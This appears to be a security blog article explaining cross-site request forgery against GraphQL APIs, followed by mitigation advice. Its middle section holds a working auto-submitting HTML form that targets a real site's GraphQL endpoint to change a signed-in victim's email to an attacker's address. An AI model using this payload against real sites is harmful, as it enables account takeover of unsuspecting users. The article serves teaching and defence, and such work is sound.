Open in app

Sign in

Write

Sign in

Exploiting CSRF in GraphQL Applications

Facundo Fernandez
3 min readFeb 7, 2025

If you haven’t sent me a LinkedIn request yet, send me a request I would love to work with you and do a collab! I will start writing articles more often, stay tuned!

Intro

Cross-Site Request Forgery (CSRF) is a well-known web vulnerability that allows attackers to execute unauthorized actions on behalf of authenticated users. While CSRF is commonly associated with traditional web applications, GraphQL APIs are also susceptible to CSRF attacks under certain conditions.

This article will walk you through:

  • The fundamentals of CSRF.
  • How GraphQL can be exploited using CSRF.
  • A CSRF PoC to exploit a vulnerable GraphQL API.
  • The most common cases of CSRF and how to prevent them.

Understanding CSRF

CSRF occurs when an attacker forces an authenticated user to send an unintended request to a web application. Since the request is automatically authenticated via cookies, the action is performed as if the user had initiated it themselves.

Common Applications Vulnerable to CSRF

  1. Banking and Financial Apps — Transferring funds, changing user settings.
  2. E-commerce Sites — Modifying user information, adding/removing items from carts.
  3. Social Media Platforms — Sending messages, changing profile information.
  4. Admin Panels & CMS — Modifying users, changing security settings.
  5. GraphQL APIs — Changing email, passwords, or other sensitive information.

Exploiting GraphQL CSRF

Unlike traditional REST APIs, GraphQL accepts complex queries in JSON format, often requiring Content-Type: application/json. However, if the GraphQL endpoint does not implement CSRF protections such as CSRF tokens or SameSite cookie policies, attackers can still abuse authenticated users.

The GraphQL CSRF Proof-of-Concept (PoC)

Below is an HTML CSRF attack that attempts to change the email address of an authenticated user.

<!DOCTYPE html>
<html>

<body>
    <form id="csrfForm" action="https://indeed.com/graphql/v1" method="POST">
        <input type="hidden" name="query" value="
        mutation changeEmail($input: ChangeEmailInput!) {
          changeEmail(input: $input) {
            email
          }
        }
      ">
        <input type="hidden" name="operationName" value="changeEmail">
        <input type="hidden" name="variables" value='{"input":{"email":"hacker@hackerone.com"}}'>
    </form>

    <script>
        document.getElementById("csrfForm").submit(); // Auto-submit when victim visits the page
    </script>
</body>

</html>

How This Works

  1. An authenticated user visits the attacker’s webpage.
  2. The form auto-submits, sending a POST request to the target GraphQL API.
  3. Since the user is already authenticated, their browser includes their session cookies.
  4. If no CSRF protections are in place, the attack successfully changes the email.

Why Some GraphQL APIs Are Vulnerable to CSRF

  1. They rely solely on cookies for authentication — When the browser sends requests with stored cookies, CSRF can be exploited.
  2. They don’t implement CSRF tokens — No X-CSRF-Token means no verification that the request originated from a legitimate page.
  3. They allow cross-origin requests — If Access-Control-Allow-Origin: * is set, CORS protections are ineffective.
  4. They don’t enforce SameSite attributes on cookiesSameSite=None cookies allow cross-site requests.

Mitigation Strategies

To prevent CSRF attacks in GraphQL APIs, developers should implement the following best practices:

1. Use CSRF Tokens

Require a unique token in each request and validate it on the server.

2. Implement SameSite Cookies

Set cookies with:

Set-Cookie: session=abc123; Secure; HttpOnly; SameSite=Strict

This prevents cookies from being sent in cross-site requests.

3. Require Custom Headers for API Requests

GraphQL APIs should enforce the presence of a custom header:

X-Requested-With: XMLHttpRequest

This prevents requests from being sent via simple HTML forms.

4. Use CORS with Credential Restrictions

Limit cross-origin access with strict CORS policies:

Access-Control-Allow-Origin: https://trusted-site.com
Access-Control-Allow-Credentials: true

This ensures that only trusted origins can send authenticated requests.

5. Implement User Authentication Re-verification

For sensitive actions like changing emails or passwords, require the user to re-enter their password.

CSRF vulnerabilities in GraphQL APIs are real and exploitable if proper security measures are not in place. Attackers can abuse this flaw to modify user data, change security settings, or take over accounts. By understanding the risks and applying robust defenses, developers can protect their applications from such attacks.

Stay ethical, stay sharp — your skills can make a difference.

Free

Distraction-free reading. No ads.

Organize your knowledge with lists and highlights.

Tell your story. Find your audience.

Membership

Read member-only stories

Support writers you read most

Earn money for your writing

Listen to audio narrations

Read offline with the Medium app

Bug Bounty
Cybersecurity
Offensive Security
Penetration Testing
Data Breach

Facundo Fernandez
Facundo Fernandez

Written by Facundo Fernandez

1.2K Followers
87 Following

Www.linkedin.com/in/facufernandez

Responses (1)

Write a response

What are your thoughts?

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams